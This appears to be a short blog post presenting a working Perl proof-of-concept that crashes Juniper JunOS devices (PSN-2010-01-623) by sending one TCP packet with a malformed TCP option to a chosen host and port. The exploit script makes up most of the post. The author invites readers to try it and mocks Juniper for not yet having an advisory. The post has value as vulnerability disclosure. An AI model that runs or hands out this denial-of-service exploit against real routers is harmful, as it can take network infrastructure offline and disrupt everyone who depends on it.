This code works for me, over and over again. Let me know if it works for you. Sorry about the shitty quality of the video, all I had handy was my Blackberry.
UPDATE: I’ve posted a much better video of the PSN-2010-01-623 exploit in action.
$ cat junos-crash.pl #!/usr/bin/perl my $host = shift; my $port = shift; use Net::Packet qw($Env); use Net::Packet::IPv4; my $ip = Net::Packet::IPv4->new(dst => $host); use Net::Packet::TCP; my $tcp = Net::Packet::TCP->new( dst => $port, options => "\x65\x02\x01\x01", ); use Net::Packet::Frame; my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp); $frame->send;
Now can I see your advisory, Juniper?
UPDATE: Nevermind, Juniper, I found it.